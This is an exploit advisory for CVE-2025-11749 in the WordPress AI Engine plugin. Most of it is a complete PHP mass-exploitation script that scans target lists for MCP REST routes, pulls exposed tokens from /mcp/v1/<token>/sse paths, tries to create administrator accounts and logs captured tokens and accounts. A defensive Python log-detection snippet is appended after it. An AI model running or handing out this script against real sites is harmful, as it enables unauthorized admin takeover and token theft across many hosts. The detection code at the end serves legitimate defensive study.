| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2025-11749 | 8 Nov 2025 03:19 | – | githubexploit |
| CVE-2025-11749 | 4 Nov 2025 18:16 | – | circl |
| WordPress plugin AI Engine Information Disclosure Vulnerability | 5 Nov 2025 00:00 | – | cnnvd |
| CVE-2025-11749 | 5 Nov 2025 05:31 | – | cve |
| CVE-2025-11749 AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation | 5 Nov 2025 05:31 | – | cvelist |
| EUVD-2025-37802 | 5 Nov 2025 05:31 | – | euvd |
| WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE | 4 Dec 2025 18:55 | – | metasploit |
| WordPress AI Engine Plugin - Token Exposure | 2 Jun 2026 10:14 | – | nuclei |
| CVE-2025-11749 | 5 Nov 2025 06:15 | – | nvd |
| WordPress AI Engine 3.1.3 Remote Code Execution | 4 Dec 2025 00:00 | – | packetstorm |

=============================================================================================================================================
| # Title : WordPress AI Engine 3.1.3 Mass MCP Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ai-engine/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211374/ & CVE-2025-11749
[+] Summary :
This advisory documents a fully automated PHP-based exploitation framework designed to perform mass enumeration,
plugin detection, token extraction, and automated account creation targeting vulnerable WordPress MCP-related REST API endpoints.
The tool uses polymorphic payload generation, bypasses SSL verification, and integrates a dual-mode engine (CLI & HTML).
It is suitable for mass‑scale penetration testing, vulnerability validation, and research purposes.
The script allows:
    - Automatic POST-based admin creation attempts
    - Automatic detection of API routes /mcp/v1/ and /mwai/v1/
    - Automated token extraction
    - HTML Exploitation UI
    - Randomized payload polymorphism
    - Mass target input (list-based)
    - Logging of results to multiple output files
[+] Vulnerability Description :
Several WordPress MCP plugins expose insecure REST API endpoints under:
    /wp-json/mcp/v1/*
    /wp-json/mwai/v1/*
[+] Some installations allow:
    - Unauthenticated access
    - Token disclosure
    - User creation without privilege checks
    - Sensitive route discovery
The tool exploits these weaknesses by programmatically interacting with the endpoints to extract tokens and perform automated admin creation attempts.
[+] Impact :
A remote attacker can:
    - Extract valid service tokens
    - Register new administrator-level accounts
    - Access endpoints intended for privileged users
    - Automate exploitation across thousands of hosts
    - Perform further attacks using the obtained tokens
Impact Rating: Critical
[+] PoC :
Save as scan.php
Add one target per line: targets.txt
php scan.php targets.txt

File                   Description
success_results.txt    Successful token captures
tokens_only.txt        Extracted tokens only
created_admins.txt     Accounts created via POST exploit
--------------------------------
<?php
// ============================================================================
// by: Indoushka
// Supports: Windows / Linux / macOS
// ============================================================================
// Disable SSL warnings
putenv('NO_PROXY=*');
// Output files
$successFile = "success_results.txt";
$adminsFile = "created_admins.txt";
$tokensFile = "tokens_only.txt";
// Default credentials
$target_username = "indoushka";
$target_password = "StrongPass!321";
$target_email = "[email protected]";
// User-Agent
$user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120 Safari/537.36";
// ============================================================================
// Write token to file
// ============================================================================
function write_token($target, $token) {
global $tokensFile;
if (!empty(trim($token))) {
file_put_contents($tokensFile, "$target | token: $token\n", FILE_APPEND);
}
}
// ============================================================================
// Banner
// ============================================================================
function banner() {
echo "
===============================================
Nxploited PHP Automated Tool
Converted & Enhanced by: Indoushka
===============================================
";
}
// ============================================================================
// Random Payload Generator (polymorphic)
// ============================================================================
function generate_payload() {
return base64_encode("Nxploited-Payload-" . rand(1000, 9999) . "-" . microtime(true));
}
// ============================================================================
// Send POST request
// ============================================================================
function send_post($url, $data, $headers = []) {
global $user_agent;
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_USERAGENT => $user_agent,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 20,
CURLOPT_HTTPHEADER => $headers
]);
$response = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return [$response, $info];
}
// ============================================================================
// Process Target
// ============================================================================
function process_target($url) {
global $target_username, $target_password, $target_email, $successFile;
$payload = generate_payload();
list($resp, $info) = send_post($url, [
"username" => $target_username,
"password" => $target_password,
"email" => $target_email,
"payload" => $payload
]);
if (preg_match('/token[\"\:\s]+([A-Za-z0-9\.\-\_]+)/i', $resp, $m)) {
$token = $m[1];
write_token($url, $token);
file_put_contents($successFile, "$url => SUCCESS | token: $token\n", FILE_APPEND);
}
return $resp;
}
// ============================================================================
// Main Entry Point
// ============================================================================
if (php_sapi_name() == "cli") {
banner();
global $argc, $argv;
if ($argc < 2) {
die("Usage: php script.php targets.txt\n");
}
$targets_file = $argv[1];
if (!file_exists($targets_file)) {
die("[-] Target list not found.\n");
}
$targets = file($targets_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
echo "[*] Processing: $t\n";
process_target($t);
echo "[OK] Completed\n\n";
}
}
// ============================================================================
// Mass MCP Exploit (HTML Version)
// ============================================================================
function rand_color() {
return "rgb(" . rand(34,85) . "," . rand(49,160) . "," . rand(63,255) . ")";
}
function print_banner_html() {
$banner = "
__ __ _ _____ _ _____ ____
| \/ | / \ | ____| | | ____| _ \
| |\/| | / _ \ | _| | | | _| | |_) |
| | | |/ ___ \| |___| |___| |___| _ <
|_| |_/_/ \_\_____|_____|_____|_| \_\
";
foreach (explode("\n", $banner) as $line) {
echo "<span style='color:" . rand_color() . "'>$line</span><br>";
}
echo "<br><b>Mass MCP Exploit | Nxploited (Converted by Indoushka)</b><br><br>";
}
function read_targets_html($file) {
if (!file_exists($file)) return [];
$out = [];
foreach (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $u) {
$u = trim($u);
if ($u === "") continue;
if (!preg_match("#^https?://#i", $u)) {
$u = "http://" . $u;
}
$out[] = $u;
}
return $out;
}
function write_result_html($file, $msg) {
file_put_contents($file, $msg . "\n", FILE_APPEND);
}
function http_get_json($url) {
$ua = "Mozilla/5.0 (Windows NT " . rand(7, 11) . ") AppleWebKit/" . rand(500, 999);
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_TIMEOUT => 10,
CURLOPT_USERAGENT => $ua
]);
$out = curl_exec($ch);
curl_close($ch);
return json_decode($out, true);
}
function plugin_installed($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/");
if (!isset($data["routes"])) return false;
foreach ($data["routes"] as $route => $v) {
if (strpos($route, "/mcp/v1/") === 0) return true;
if (strpos($route, "/mwai/v1/") === 0) return true;
}
return false;
}
function find_token($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/mcp/v1/");
if (!isset($data["routes"])) return null;
foreach ($data["routes"] as $route) {
$parts = explode("/", trim($route, "/"));
if (count($parts) >= 4 && $parts[0] == "mcp" && $parts[1] == "v1" && end($parts) == "sse") {
$token = $parts[2];
if ($token !== "" && strpos($token, "/") === false) {
write_result_html("tokens_only.txt", "$url => $token");
return $token;
}
}
}
return null;
}
function process_target_html($url) {
echo "[*] Checking: $url<br>";
if (!plugin_installed($url)) {
echo "<span style='color:red'>[x] Plugin not installed</span><br>";
return;
}
$token = find_token($url);
if ($token) {
echo "<span style='color:green'>[+] Token: $token</span><br>";
write_result_html("success_results.txt", "$url => TOKEN: $token");
} else {
echo "<span style='color:red'>[-] No token</span><br>";
}
}
// ============================================================================
// Nxploited Worker
// ============================================================================
function Nxploited_worker($targets) {
if (!is_array($targets)) {
echo "Error: targets must be array.\n";
return;
}
foreach ($targets as $target) {
echo "[*] Checking internet: $target\n";
Nxploited_internet_check($target);
}
}
function Nxploited_internet_check($target) {
$payload = "Nxploited-Check-" . md5($target . microtime(true));
$ctx = stream_context_create([
"http" => [
"method" => "GET",
"timeout" => 5,
"header" => "User-Agent: $payload\r\n"
]
]);
$res = @file_get_contents($target, false, $ctx);
if ($res !== false) {
echo "[OK] Connection success: $target\n";
} else {
echo "[FAIL] Unreachable: $target\n";
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
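
Detection-side view of the script above, as an added example that is not part of the original advisory: it scans web server access logs for the User-Agent strings the script sends and for a client that reads the REST route index and then requests a `/mcp/v1/<token>/sse` route. The Combined Log Format, the function and signal names, and the sample lines are assumptions made for this example.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# User-Agent strings produced by the script on this page.
TOOL_UA = [re.compile(p) for p in (
    r'^Nxploited-Check-[0-9a-f]{32}$',  # Nxploited_internet_check()
    r'^Mozilla/5\.0 \(Windows NT (?:[7-9]|1[01])\) AppleWebKit/[5-9]\d\d$',  # http_get_json()
    r'^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit/537\.36 '
    r'Chrome/120 Safari/537\.36$',  # send_post()
)]
INDEX_RE = re.compile(r'^/wp-json/(?:(?:mcp|mwai)/v1/?)?(?:\?.*)?$')  # REST route indexes
TOKEN_RE = re.compile(r'^/wp-json/mcp/v1/[^/?]+/sse(?:[/?].*)?$')     # /mcp/v1/<token>/sse

def analyze(lines):
    """Return {client_ip: sorted signal names} for clients that need triage."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format
        ip, method, path, status, ua = m.groups()
        if any(p.match(ua) for p in TOOL_UA):
            seen[ip].add("tool_user_agent")
        if TOKEN_RE.match(path):
            # Escalate when the same client first read the index that lists the route.
            after = "rest_index_read" in seen[ip]
            seen[ip].add("token_route_after_index" if after else "token_route")
        elif method == "GET" and status == "200" and INDEX_RE.match(path):
            seen[ip].add("rest_index_read")
    # A lone index read or a lone token-route request is ordinary traffic.
    quiet = ({"rest_index_read"}, {"token_route"})
    return {ip: sorted(s) for ip, s in seen.items() if s not in quiet}

def _line(ip, request, ua):  # builds one constructed log line
    return f'{ip} - - [05/Nov/2025:10:00:00 +0000] "{request} HTTP/1.1" 200 512 "-" "{ua}"'

# Constructed sample lines (documentation addresses, placeholder token).
SAMPLE = [
    _line("198.51.100.7", "GET /wp-json/", "Mozilla/5.0 (Windows NT 9) AppleWebKit/742"),
    _line("198.51.100.7", "GET /wp-json/mcp/v1/", "Mozilla/5.0 (Windows NT 11) AppleWebKit/615"),
    _line("198.51.100.7", "GET /wp-json/mcp/v1/TOKEN-PLACEHOLDER/sse", "curl/8.5.0"),
    _line("203.0.113.20", "GET /wp-json/mcp/v1/TOKEN-PLACEHOLDER/sse", "example-mcp-client/1.0"),
    _line("192.0.2.44", "GET /", "Nxploited-Check-0123456789abcdef0123456789abcdef"),
    _line("203.0.113.9", "GET /wp-json/", "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/145.0"),
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Request bodies are not in access logs, so the POST fields the script sends are not matched here; a hit on `token_route_after_index` is the signal to rotate the MCP token and review recently created administrator accounts.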